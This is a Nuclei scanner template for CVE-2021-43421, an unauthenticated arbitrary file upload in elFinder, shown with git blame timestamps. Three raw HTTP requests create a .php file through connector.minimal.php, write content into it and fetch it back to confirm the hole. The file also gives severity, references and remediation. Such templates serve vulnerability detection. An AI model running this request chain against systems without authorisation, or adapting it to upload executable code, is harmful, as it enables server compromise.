nuclei-templates/http/cves/2021/CVE-2021-43421.yaml

61 lines
2.1 KiB
YAML
Raw Normal View History

2022-11-24 05:35:34 +00:00
id: CVE-2021-43421
info:
name: Studio-42 elFinder <2.1.60 - Arbitrary File Upload
2022-11-24 05:35:34 +00:00
author: akincibor
severity: critical
2022-11-24 05:39:24 +00:00
description: |
Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to upload malicious files to the server and execute arbitrary code.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade to the latest version of Studio-42 elFinder plugin (2.1.60 or higher) to mitigate this vulnerability.
2022-11-24 05:35:34 +00:00
reference:
- https://github.com/Studio-42/elFinder/issues/3429
- https://twitter.com/infosec_90/status/1455180286354919425
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
- https://github.com/ARPSyndicate/kenzer-templates
2022-11-24 05:39:40 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-11-24 05:39:40 +00:00
cve-id: CVE-2021-43421
cwe-id: CWE-434
2024-05-31 19:23:20 +00:00
epss-score: 0.05253
epss-percentile: 0.93023
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
2022-11-24 05:39:40 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: std42
product: elfinder
2023-12-05 09:50:33 +00:00
tags: cve,cve2021,elfinder,fileupload,rce,intrusive,std42
2022-11-24 05:35:34 +00:00
http:
2022-11-24 05:35:34 +00:00
- raw:
- |
2022-11-24 05:39:24 +00:00
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
2022-11-24 05:35:34 +00:00
Host: {{Hostname}}
Accept: */*
- |
2022-11-24 11:10:36 +00:00
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
2022-11-24 05:35:34 +00:00
Host: {{Hostname}}
- |
2022-11-24 05:39:24 +00:00
GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
2022-11-24 05:35:34 +00:00
Host: {{Hostname}}
Accept: */*
2022-11-24 05:39:24 +00:00
matchers:
- type: dsl
dsl:
2022-11-24 11:10:36 +00:00
- 'contains(body_3, "{{randstr_1}}")'
2022-11-24 05:39:24 +00:00
- "status_code == 200"
condition: and
2022-11-24 05:35:34 +00:00
extractors:
- type: regex
name: hash
group: 1
regex:
- '"hash"\:"(.*?)"\,'
2022-11-24 05:39:24 +00:00
internal: true
# digest: 490a0046304402202b9a1bdf1cbc00fde97e2d3f69bd9f98e0b6d0990fde7377b3ef61a888ad5cf2022068fa3c61d7aa62376e326713dc467e45fbc1fff477d0aa5a924bb944e6fe37df:922c64590222798bb761d5b6d8e72950